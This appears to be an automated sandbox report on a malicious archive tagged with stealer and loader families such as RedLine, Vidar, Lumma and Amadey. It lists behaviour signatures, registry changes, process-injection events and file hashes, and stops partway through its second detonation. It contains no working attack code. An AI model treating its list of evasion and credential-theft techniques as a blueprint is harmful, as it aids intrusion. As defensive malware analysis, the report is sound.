Malware Analysis Report

2025-04-03 09:36

Sample ID 250226-3fmrsaxqs6
Target quarantine.7z
SHA256 1824be1799f0c32c14c5fcb3c5d34c98b9fb4d2b867067b8ddc3d129783812fe
Tags
discovery vidar ir7am credential_access defense_evasion execution spyware stealer healer dropper evasion trojan redline testproliv infostealer amadey lumma 092155 a4d2cd persistence privilege_escalation gcleaner stealc systembc reno loader
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1824be1799f0c32c14c5fcb3c5d34c98b9fb4d2b867067b8ddc3d129783812fe

Threat Level: Known bad

The file quarantine.7z was found to be: Known bad.

Malicious Activity Summary

discovery vidar ir7am credential_access defense_evasion execution spyware stealer healer dropper evasion trojan redline testproliv infostealer amadey lumma 092155 a4d2cd persistence privilege_escalation gcleaner stealc systembc reno loader

Vidar family

Systembc family

Modifies Windows Defender TamperProtection settings

Stealc

Modifies Windows Defender notification settings

Gcleaner family

Stealc family

SystemBC

Healer

Modifies Windows Defender DisableAntiSpyware settings

Amadey

Healer family

RedLine

Vidar

Lumma Stealer, LummaC

Amadey family

Lumma family

RedLine payload

Redline family

Detect Vidar Stealer

Detects Healer an antivirus disabler dropper

Modifies Windows Defender Real-time Protection settings

GCleaner

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Sets service image path in registry

Command and Scripting Interpreter: PowerShell

Uses browser remote debugging

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Identifies Wine through registry keys

Checks BIOS information in registry

Executes dropped EXE

Loads dropped DLL

Event Triggered Execution: Component Object Model Hijacking

Reads user/profile data of local email clients

Windows security modification

Checks computer location settings

Reads user/profile data of web browsers

Unsecured Credentials: Credentials In Files

Reads data files stored by FTP clients

Enumerates connected drives

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Drops file in System32 directory

Suspicious use of SetThreadContext

Boot or Logon Autostart Execution: Authentication Package

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Drops file in Windows directory

Drops file in Program Files directory

Program crash

System Location Discovery: System Language Discovery

Browser Information Discovery

Unsigned PE

Enumerates physical storage devices

Delays execution with timeout.exe

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Scheduled Task/Job: Scheduled Task

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Modifies Internet Explorer settings

Modifies registry class

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-02-26 23:27

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral27

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20241010-en

Max time kernel

67s

Max time network

134s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\ssystemfiktums.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ae8b7ea42b54c54c85332ffd14cc41d30000000002000000000010660000000100002000000045887b44c83ad88d5136abd7e21083d503c13f484c39d93e8e1f5bf8644135fd000000000e80000000020000200000003f952c246091f772b36420468333483fe3cb24c14ccbc73adb586528902228ec200000006828d39e1c038318bfc4a92f7a523a6741129d1379c3810b1eeaf0d7ddce995a400000007371238750ecf8f613744640e853cc4b45ba14263b2d95e6b38e8f210c4d7d8a1bda886347804197c49bed3aebe4239a0e6080eda67cba9ea7657ec20737324a C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4B3EEF21-F499-11EF-82FE-DEA5300B7D45} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ae8b7ea42b54c54c85332ffd14cc41d300000000020000000000106600000001000020000000ff5933631e1a5c01a0ac9f3d7d630a3e333938b1e8c0c4cf84b29b6b64bca2c6000000000e80000000020000200000004d0dc1c45f5b78428d62d59f16d08f95d65a866887507975ec70da308985350990000000554643316711b07dac210e662c9f8fba9af28a1f3a3a4aff5795a44af41ee221228f2703f7d6a8d0bb8a2e9d31ba5701109c4af43cf9ff347f009a3f0ab813b0cbbe64bbb42ef1aba1241da94b0faa2a5b2375debb24cde2f048642c1d6a99b526ecec46ec843188542ebaac2e3170619eae4eea3947a3a50b8519ded7a7b0f30cbf00695787d89b5116e67dd1bbf099400000000311fc9b95f0aa4746f8e63c9b7115fd770135046261f4ee571b2f48b1a0aa208d1dd133e9050df96255ef52869b4fdda6f34151cdfff08aaae17b166bf82ed9 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774338" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 50a83020a688db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\ssystemfiktums.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1552 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\TarD735.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 70001cba55992328514c4563c49ca744
SHA1 b7f5e636c9c1e6808241193c9b53ed115aa4e057
SHA256 b624cb0cfd506bc70ccbfec6526b95cde9ca12354923459d82067fab61c0d107
SHA512 2e80349e47744c9731d57ec730f7faf7707b5705798b9fb3e307d0da1602f6846668888c89ec85b09da62d76e80248613b0d5f51224c2a366ea161eb6c661b89

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 decf1ce29380ee49a1118295388600ca
SHA1 4fd34a6341641c951b93733424ac885765ed8906
SHA256 aad77e6d0e4b628d62cd5a8dd620a41dd1a43484a4efc037ef50db66c9fa2822
SHA512 6e03dd6d2172dee46741808224c4f2b3075e818c69e312b646f2be3a17de0e28cce505210df1f2975401905e27efdc8de77acd746a52a25971345e5ad3d6aea9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 cdcf2971a33ccf8faa1db43b83506e93
SHA1 de2dfdc58f744f3261f93001732d69b906323d9d
SHA256 ba4dd92b06dc5832a451e6ecda9147b9f98c1d20728bc20205525276c5551487
SHA512 eb13cafc4a5aa28bdb6253c6df1d221f6d0b94762f1a1a594f6f9b3e6adfe3210f7d7d48509c789d3bdcc8ae8826344eda6395fb61bb354faafcf0d73c263e4f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 31f935ad1f2f4a5fe2c0f4cd8c1cd0dc
SHA1 3f936541074bef8c1c7327a3037131d909f99677
SHA256 bee6be86f7efa7ec400767646027e0fe3756e7f3123730d60199625f6a8119ff
SHA512 117fddf766ae566afe2dad0ffbdca93a8b02f5f18d215d2d53ee7d34eb4ea50fc13cf86208b7a6298bbfbc6014fe228214ea0543db31e40be9af5e99ffa6df3d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d682024bc77de9a62c1894f9e5071167
SHA1 590a398d66d314b268881f920319570ab2a02efd
SHA256 a2a886acd5c1fc286cfb7228a183729d0b57a681073c89f15b9a76d7b0bf268f
SHA512 155ec4bfe5ccb8336980830be1e5ede17e14037498cf340b77ddf40be45ee5416369ebb8fa0df205e829918e757bcd6a946f6bcc7e2b69806440d501c9fcc878

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bc499739cfae054cd178e8c24a4f0b5b
SHA1 d2d4d524a9239f447f350e0f65c25331664642b1
SHA256 6c23600ed6ac271377930df7f3aaecf725b7c6361b3c07bc02f0b47f1295395e
SHA512 614295ab8357a7b7c127ef312a7591dcaa5b30cb8d175848f55be38cc0bb4c9c0cb6e01ad70b5ae81c6c70e76fe7a40db6d25c628888d867aa7a200c922597da

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2c182b01a19059402ec351ca87e133eb
SHA1 858d769d7560b928c7910d72e38739d523755966
SHA256 2e70769e50842db18e70da4bd48df497fe4f150d95acbca8e3edfee45f4bd884
SHA512 f353b59eef0bb2f11cc51f0f0056baaa53e17bc4c9b311adcbcd79687b87999a7ee9dcfab41a98ba6f9447fa75ed6afca340571647ad44f328b32fc5395e659f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 00ed9e2d653713d91714493576664f9e
SHA1 c0573bbd776316ea5f28fb165af1205ec2eb1345
SHA256 abb04c6ee830c2203a8aa7a2a1fa05ed34af2fd3537ef4900972ed9b28401bfa
SHA512 674d74703f8aae84f0934c3ec11cdb46d110e56423c7f818f816db8240c5a5d57e858fb00b1ae2365bc01e57fdcd7c07964b732193e1df538ef10f3c9dbf112c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 abcdfa1cead4ff1da429ab9365824852
SHA1 6ac9931616e486d2a01872d531ac6540eadd38fc
SHA256 9484f45c5689b53c688755a46403a864947f88ab0ff42a15fe00ec2e0e979ba5
SHA512 599cd3cf5e0d181e79b398075a11a300ee088d1ef57b7ac4f5274345a8f619c920853466134cd2802fdad6c9d00b511bc8eec4b9c4eebc06afe488be504b76d2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fb21db51e1cbed039be5047f9bb59a12
SHA1 f1fb0f1373a368e304b426c1a31361de034b128a
SHA256 c71d9f5060d772f232dd8454cbdcbe3678770a22e03b58fe26e3e01a0e3a0b7d
SHA512 d39c80964355eec95490ae36771eefc1c5b2876477e0be805f41790e241c7f78884bfba066d3dd4ce822d864f909ee6219903b31057c30d73e90f6efdc8f2a76

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 44440d103dcba9092eb5aee60736108b
SHA1 4ef1dd0d22eef39822f5d91de8b32d8cca0a8b1f
SHA256 16b43a2d4a8aa0e21fa4976ada0482cfc6729a974c07774d0b507eaa38db9581
SHA512 4612d2c8a04d47001cf2844c3cad9384c20d2ce83c0d44b7eaadbcdc6b0a91819d39db445bd16d1ab27381d98bb9ca02a6ae9dbee644ec3d66fa7ca463e85761

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7d2e2bae63e72e23cf6b1baae47c22d3
SHA1 3468c3699abbb068b8489d99992ce06c77ec1fef
SHA256 d9d9ab0477424b72460cdbc923c09ee731b4726732da38bb1ac1deaf61e8a4b4
SHA512 ff511590bad2d26a073ca7e36de461a2adb4f837d1f10f3af443ad8208968b3aaff243a26a08931c867145e1ceb067298ca280bcefb4a12f75eb7f9e170c32da

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bd0b101e04996e1d74c507195868528b
SHA1 0c7189c3ffaeac23a406d65b004cce828cdd77ba
SHA256 d63d7c9a3ed5a842d8af787d65a8cc848a708c604326ae0cb88454464395517c
SHA512 dcb2dfe6088907182c943efcebbd54d42469a55898005e87092da037a335e2412d7a95fe5cf5cdf35db2825d12150d0b3af0f816f6137a5d72f122fa353b287b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 35ac7e57438a01a2b44ac3e5be05c1ba
SHA1 a6c79fb04413a2c4f67fdc6dba4a141ed38b4835
SHA256 bfc43e27beaa990e771e6f6666c65b600df47d1d3b8562e0ee4e216a3b33c296
SHA512 f11075dabc2d34ff17e3973a78ce1142414136c07125cf8d822bb2ad46452bda01c7e1431275a68926c1571ef3c010c560dd0bc8c69cdc49a6cbc38e057cf301

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fba793a8201e9815ddeec435dafe7519
SHA1 94443023b753e8ce4e97888a8f0620fe825a7f3b
SHA256 fb62ace77958c6076bf9541ea0846e55f77c5bba589c17f41e7a92285e302250
SHA512 ee83f3195f2a4f0742d3679f0d8379c6c20c727054646d00f40b75b78d53ecde3d26facf4ab60c9fede8002885034dafb2f7d09ea1f6984f6936482d570287df

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b9b2a5b12c5b8a4a00485702952138ef
SHA1 3b6fb8b666d675b527378d58683d5ed38571d262
SHA256 9f43a23a19151d13487f7e808b21cfdb98e7a4bfcaaf42a9a346b8b4904e2e67
SHA512 69ab36f8c5ea7a6662c4c7379add3e4403ce0c6411c5b5d2643b362c65362dfe2d5071822fd9d8b57f60322fdb6adab90a06f80c1ae57182e750182b81e2407f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d1671e352f16043716fcbd1792f533f5
SHA1 c014dd37a1082cb350363110b30d20842b4064d0
SHA256 4ad6caf87f40df017cb1e8c9f2732e79c75ea5e5425f793d8d946549e19120c1
SHA512 c6b26ab39b74a2945de55845a8e20d93e11e3f4a514193729983c218e50a59d65c15762db1af2d5d756d4b6ba0bdb9c89ee78cf69eed17588da1249b3b9cf05a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 de2e1b07cd2360248afbcc5ae5f26a5a
SHA1 c92d0f98c21ff9e11da080b707f52fb11d638d76
SHA256 1444e1dfe5b03a9f3d2fff8ffeddbfd0af4d357e125ebe65bec64622b7e128cf
SHA512 c4b2ec0d985c78761ecf4be024f29ba9cab78e94c3040866936c86b74a3942f4167de2fc78107b0d0dc63e8cc8d872ab02f5019883ec03e5db0559a39de4a30b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7d5fd7d1a3fd09424692ac101c7b5324
SHA1 ec248ae02c2ad8d68bd9767b41eadc51b8480efc
SHA256 7296e0b85efe3d6cdbef4d8617fc646773f602cbf693cfe19f983a11c2990e69
SHA512 a57ce92174545adaea2980feb10e6e640b2be98050d58e207e2ab06b6587d9da2014552302d646bbb059d622dacefed43de7af99090e249319e1d0415f6e4086

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a2095d9a29fc83cf0e876cae66a39dc5
SHA1 34208dba4502476b715d26404feec22676dedc4b
SHA256 86e1f9e742f40a4998089136b082595a716d26442ded6b9025f9a5acd731d515
SHA512 5c9b4dd60eabe0e98982514b2341dfb43a4207e4322cdb05bc8cddf582fbceb1e4235991c37fe3776a8fa6a3eaed817ea7a8451c2c71d98f81f5ebf65c1c7844

Analysis: behavioral5

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20240903-en

Max time kernel

150s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2308 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
